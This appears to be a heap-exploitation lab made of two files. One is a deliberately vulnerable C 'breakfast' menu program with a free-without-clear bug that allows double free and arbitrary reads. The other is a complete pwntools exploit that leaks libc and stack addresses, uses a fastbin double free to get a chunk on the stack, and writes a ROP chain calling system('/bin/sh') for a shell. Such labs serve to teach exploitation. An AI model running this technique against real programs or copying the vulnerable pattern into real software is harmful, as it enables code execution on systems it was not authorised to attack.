File: fastbin dup into stack/breakfast.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define MAX 100

// gcc breakfast.c -o breakfast -fno-stack-protector -Wl,-z,relro,-z,now

struct H {
	void* m[MAX];
	unsigned size[MAX];
};

struct H ptr;

int clear_stdin() {
    while (getchar() != '\n');
    return 1;
}

void menu() {
	puts("---------Select Menú--------");
	puts("1.- Create breakfast");
	puts("2.- Ingredients");
	puts("3.- View");
	puts("4.- Delete");
	puts("5.- Exit");
}


void crea() {
	unsigned pos = 0;
	char c;
	puts("Enter the position of breakfast");
	while ((scanf("%u%c", &pos, &c) != 2 || c != '\n') && clear_stdin());
	if (pos < MAX) {
		puts("Enter the size in kcal.");
		while ((scanf("%u%c", &ptr.size[pos], &c) != 2 || c != '\n') && clear_stdin());
		if (ptr.size[pos] >= 0 && ptr.size[pos] <= 80) {
			ptr.m[pos] = malloc(ptr.size[pos]);
		} else {
			puts("Bad size.");
		}
	} else {
		puts("Bad position");
	}
}

void modify() {
	unsigned i = 0;
	char c;
	puts("Introduce the menu to ingredients");
	while ((scanf("%u%c", &i, &c) != 2 || c != '\n') && clear_stdin());
	if (i < MAX) {
		puts("Enter the ingredients");
		read(0, ptr.m[i], ptr.size[i]);
	} else {
		puts("Bad position");	
	}
}

void ver() {
	unsigned i = 0;
	char c;
	puts("Enter the breakfast to see");
	while ((scanf("%u%c", &i, &c) != 2 || c != '\n') && clear_stdin());
	if (i < MAX) {
		write(1, *((void **) ptr.m[i]), ptr.size[i]);
	} else {
		puts("Bad position");
	}	
}

void libera() {
	unsigned i = 0;
	char c;
	puts("Introduce the menu to delete");
	while ((scanf("%u%c", &i, &c) != 2 || c != '\n') && clear_stdin());
	if (i < MAX) {
		free(ptr.m[i]);
	} else {
		puts("Bad position");
	}
}	

int main(void) {
	int i = 0;
	char c;
	
	setvbuf(stdin, 0, 2, 0);
  	setvbuf(stdout, 0, 2, 0);

	do {
      		menu();
    		while ((scanf("%u%c", &i, &c) != 2 || c != '\n') && clear_stdin());
    		switch (i) {
	    		case 1: crea(); 
	    		break;
			case 2: modify(); 
			break;
			case 3: ver(); 
			break;
			case 4: libera(); 
			break;
			case 5: printf("Have a good day!!\n"); 
			return 0;
    		}
    		
	} while (1);
}

File: fastbin dup into stack/breakfast.py
from pwn import *

# Tested on Ubuntu 16.04

def menu():
	r.recvuntil("5.- Exit\n")

def create(pos, size):
	menu()
	r.sendline("1")
	r.recvuntil("Enter the position of breakfast\n")
	r.sendline(str(pos))
	r.recvuntil("Enter the size in kcal.\n")
	r.sendline(str(size))

def ingredients(num, payload):
	menu()
	r.sendline("2")
	r.recvuntil("Introduce the menu to ingredients\n")
	r.sendline(str(num))	
	r.recvuntil("Enter the ingredients\n")
	r.sendline(payload)

def ver(num):
	menu()
	r.sendline("3")
	r.recvuntil("Enter the breakfast to see\n")
	r.sendline(str(num))
	data = r.recvline()
	return data

def delete(num):
	menu()
	r.sendline("4")
	r.recvuntil("Introduce the menu to delete\n")
	r.sendline(str(num))

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

r = remote("localhost", 4444)
create(1, 80)
create(2, 80)
ingredients(1, p64(0x602030))
leak = u64(ver(1)[:8].ljust(8, '\0'))
base_libc = leak - 0x3c48e0
p_environ = base_libc + libc.symbols['environ']
ingredients(1, p64(p_environ))
p_stack = u64(ver(1)[:8].ljust(8, '\0')) - 0x134
p_system = base_libc + libc.symbols['system']
p_bin_sh = base_libc + next(libc.search("/bin/sh\0"))
print "[+] ptr stack: %s" % hex(p_stack)
print "[+] base libc: %s" % hex(base_libc)
print "[+] system   : %s" % hex(p_system)
print "[+] /bin/sh  : %s" % hex(p_bin_sh) 
delete(1)
delete(2)
delete(1)
ingredients(1, p64(p_stack))
create(3, 80)
create(96, 80)
ingredients(96, "A"*0x14 + p64(0x400c03) + p64(p_bin_sh) + p64(p_system))
r.interactive()


